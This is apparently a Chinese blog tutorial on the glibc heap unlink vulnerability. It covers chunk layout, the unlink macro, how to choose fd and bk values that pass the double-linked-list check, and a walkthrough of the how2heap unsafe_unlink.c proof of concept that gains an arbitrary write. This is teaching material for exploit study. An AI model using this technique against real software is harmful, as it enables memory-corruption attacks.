0%

unlink漏洞的原理和利用

0x1 前言

网上关于unlink漏洞的文章已经非常多了,但是作为一个web狗,为了搞明白这个漏洞,还是花了好长时间,中间踩了几个坑,写这篇文章是希望跟我一样啃二进制的web狗少走弯路。

0x2 unlink是什么

unlink说的是linux系统在进行空闲堆块管理的时候,进行空闲堆块的合并操作。一般发生在程序进行堆块释放之后。介绍unlink之前先的说一下linux系统中的堆块的结构(其实就是一个双向链表):

由于篇幅的问题,这里不再详细说明linux的堆块管理过程,可以参考这篇文章,里面说的十分详细,但是有一些错误,至于哪里错了,自己调试调试就知道了。这里只说一下linux堆块的结构如如下图所示:
http://pic.wonderkun.cc/uploads/2017/12/1.png

unlink的操作可以使用ctf-wiki的图可以很好描述:

http://pic.wonderkun.cc/uploads/2017/12/2.png

其实最终就进行了一个在双向链表中删除节点P的操作,让P堆块和BK堆块合并成一个空闲堆块:

做的操作就是:

1
2
p->fd->bk = p->bk
p->bk->fd = p->fd

假如系统中有下图所示的两个堆块:

http://pic.wonderkun.cc/uploads/2017/12/3.png

堆块Q和堆块P物理相邻,此时的堆块p已经处于空闲状态了。但是如果我们通过某种操作,比如说堆溢出或者写越界等,控制了堆块p的Fd指针的值和Bk指针的值,修改为我们想要的内容:让Fd=addr - 3*4, Bk = except value

unlink漏洞的结果是在任意的可写地址写入任意你想写的内容,这里里面牵扯两个变量:第一个. 在什么地址写,第二个.写入什么内容

addr就表示任意一个你想控制的可写地址

except value 是你想在addr中写入的值

下面就来看漏洞是怎么发生的,当我们free(Q)的时候,系统就发现Q堆块后面的P堆块也处于free状态,就会Q堆块和P堆块的合并操作。继而对堆块P进行unlink的操作,下面看一下unlink的操作过程(以32位系统说明问题):

1
2
3
4
1. FD = P->fd = addr - 3*4 
2. BK = P->bk = except value
3. FD->bk =BK , 即 *(addr-3*4+3*4) = BK = except value
4. BK->fd =FD , 即 *(except value + 8) = FD = addr - 3*4

看到第三条,想必很多人都会有一个跟我一样的疑问。FD指向的位置,也就是(addr-34)这个地址的位置并不是一个堆块的起始地址,那么它怎么会有bk指针呢? *其实在汇编中,根本没有结构体的概念,所有的一切都是偏移,要找FD的bk,其实就是就是找距离FD指针指向的地址的三个字的偏移的地方,所以访问的地址是(FD+3*4)**

这样我们就可以实现在任意可写地址addr中写入except value这样一个值了。但是还需要注意:expect value +8 地址具有可写的权限,不会导致程序崩溃,这样就产生了一个任意地址写的漏洞。

unlink其实是libc中malloc.c文件中的一个宏定义,代码如下(P代表当前堆块,FD代表下一个堆块,BK代表前一个堆块):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#define unlink(P, BK, FD) {                                            \
FD = P->fd; \
BK = P->bk; \
if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \
malloc_printerr (check_action, "corrupted double-linked list", P); \
else { \
FD->bk = BK; \
BK->fd = FD; \
if (!in_smallbin_range (P->size) \
&& __builtin_expect (P->fd_nextsize != NULL, 0)) { \
assert (P->fd_nextsize->bk_nextsize == P); \
assert (P->bk_nextsize->fd_nextsize == P); \
if (FD->fd_nextsize == NULL) { \
if (P->fd_nextsize == P) \
FD->fd_nextsize = FD->bk_nextsize = FD; \
else { \
FD->fd_nextsize = P->fd_nextsize; \
FD->bk_nextsize = P->bk_nextsize; \
P->fd_nextsize->bk_nextsize = FD; \
P->bk_nextsize->fd_nextsize = FD; \
} \
} else { \
P->fd_nextsize->bk_nextsize = P->bk_nextsize; \
P->bk_nextsize->fd_nextsize = P->fd_nextsize; \
} \
} \
} \
}

可以看到添加了如下的防护机制:

1
2
3
4
5
6
7
8
9
10
// 由于P已经在双向链表中,所以有两个地方记录其大小,所以检查一下其大小是否一致。
if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \
malloc_printerr (check_action, "corrupted double-linked list", P); \
else { \
FD->bk = BK; \
BK->fd = FD; \
if (!in_smallbin_range (P->size) \
&& __builtin_expect (P->fd_nextsize != NULL, 0)) { \
assert (P->fd_nextsize->bk_nextsize == P); \
assert (P->bk_nextsize->fd_nextsize == P);

需要满足做到如下两点

1
2
P->fd->bk=P
P->bk->fd=P

在看我们在0x3里面选的addr和except value,我们需要构造两个巧妙的值,才能绕过上面的防护。

但是addr和except value该怎么取呢?不妨就让他们相等,列出一个等式(注意下面不是赋值,是等式),求解

1
2
P->fd->bk =*(addr-3*4+3*4)=P    ==>  addr = &P 
P->bk->fd = *(except value + 2*4) = P => except value = &P-2*4

*所以当我们把fd内容设置为(&P-3\4),把bk的内容设置为(&P-2*4)的时候,就可以绕过这个安全检测机制 **。

接下里就是修改指针的内容了:

1
2
3
4
5
p->fd->bk = p->bk
p->bk->fd = p->fd

因为 p->fd->bk=P->bk->fd = P
所以最后 P=&P-3*4

也就是说,P指针本来是指向堆空间的,但是他现在它指向了比它地址小12的地方。假如说P指针是一个全局变量,是存在bss段的,那么我们就可以通过修改bss段的P指针实现对任意地址的读和写。

0x5 分析unsafe unlink的代码,理解unlink漏洞

unsafe unlinke的代码在这里:https://github.com/Escapingbug/how2heap/blob/master/unsafe_unlink.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>


uint64_t *chunk0_ptr;

int main()
{
printf("Welcome to unsafe unlink 2.0!\n");
printf("Tested in Ubuntu 14.04/16.04 64bit.\n");
printf("This technique can be used when you have a pointer at a known location to a region you can call unlink on.\n");
printf("The most common scenario is a vulnerable buffer that can be overflown and has a global pointer.\n");

int malloc_size = 0x80; //we want to be big enough not to use fastbins
int header_size = 2;
printf("The point of this exercise is to use free to corrupt the global chunk0_ptr to achieve arbitrary memory write.\n\n");
chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0
uint64_t *chunk1_ptr = (uint64_t*) malloc(malloc_size); //chunk1
printf("The global chunk0_ptr is at %p, pointing to %p\n", &chunk0_ptr, chunk0_ptr);
printf("The victim chunk we are going to corrupt is at %p\n\n", chunk1_ptr);
printf("We create a fake chunk inside chunk0.\n");
printf("We setup the 'next_free_chunk' (fd) of our fake chunk to point near to &chunk0_ptr so that P->fd->bk = P.\n");
chunk0_ptr[2] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*3);
printf("We setup the 'next_free_chunk' (bk) of our fake chunk to point near to &chunk0_ptr so that P->bk->fd = P.\n");
printf("With this setup we can pass this check: (P->fd->bk != P || P->bk->fd != P) != False\n");
chunk0_ptr[3] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*2);
printf("Fake chunk fd: %p\n",(void*) chunk0_ptr[2]);
printf("Fake chunk bk: %p\n",(void*) chunk0_ptr[3]);

printf("We assume that we have an overflow in chunk0 so that we can freely change chunk1 metadata.\n");
uint64_t *chunk1_hdr = chunk1_ptr - header_size;
printf("We shrink the size of chunk0 (saved as 'previous_size' in chunk1) so that free will think that chunk0 starts where we placed our fake chunk.\n");
printf("It's important that our fake chunk begins exactly where the known pointer points and that we shrink the chunk accordingly\n");
chunk1_hdr[0] = malloc_size;
printf("If we had 'normally' freed chunk0, chunk1.previous_size would have been 0x90, however this is its new value: %p\n",(void*)chunk1_hdr[0]);
printf("We mark our fake chunk as free by setting 'previous_in_use' of chunk1 as False.\n");
chunk1_hdr[1] &= ~1;

printf("Now we free chunk1 so that consolidate backward will unlink our fake chunk, overwriting chunk0_ptr.\n");
printf("You can find the source of the unlink macro at https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344\n");
free(chunk1_ptr);

printf("At this point we can use chunk0_ptr to overwrite itself to point to an arbitrary location.\n");
char victim_string[8];
strcpy(victim_string,"Hello!~");
chunk0_ptr[3] = (uint64_t) victim_string;

printf("chunk0_ptr is now pointing where we want, we use it to overwrite our victim string.\n");
printf("Original value: %s\n",victim_string);
chunk0_ptr[0] = 0x4141414142424242LL;
printf("New Value: %s\n",victim_string);
}

1.申请两个大小为0x80的堆块:

1
2
chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0
uint64_t *chunk1_ptr = (uint64_t*) malloc(malloc_size); //chunk1

2.在chunk0中构建一个伪的堆块,以chunk0_ptr为起始地址

1
2
chunk0_ptr[2] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*3);
chunk0_ptr[3] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*2);

http://pic.wonderkun.cc/uploads/2017/12/4.png

3.修改chunk1的pre_chunk_size字段和size字段,以便于在free(chunk1)的时候,可以合并上面构造的那个伪块

1
2
3
4
header_size = 2
uint64_t *chunk1_hdr = chunk1_ptr - header_size;
chunk1_hdr[0] = malloc_size; //上一个堆块的大小,就是伪块的大小
chunk1_hdr[1]&=~1; //末位清零,最后一位为零表示上一个堆块是free状态,可以和它合并

http://pic.wonderkun.cc/uploads/2017/12/5.png

最后完整的布局图如下:

http://pic.wonderkun.cc/uploads/2017/12/6.png
4.在free(chunk1_ptr)之后,chunk0_ptr指向了&chunk0_ptr-3的地方

http://pic.wonderkun.cc/uploads/2017/12/7.png

5.漏洞证明

1
2
3
chunk0_ptr[3] = (uint64_t) victim_string //其实就是chunk0_ptr[3] = &victim_string 
chunk0_ptr[0] = 0x4141414142424242LL;
printf("New Value: %s\n",victim_string);

修改chunk0_ptr[3]的值其实是在修改chunk0_ptr[3]指向的位置,让它指向vimtim_string.

然后修改chunk0_ptr[0]就修改了vimtim_string字符串本身。

也就是说我们通过修改chunk0_ptr[3]的值为我们想要修改的地址,就可以实现任意地址读写操作。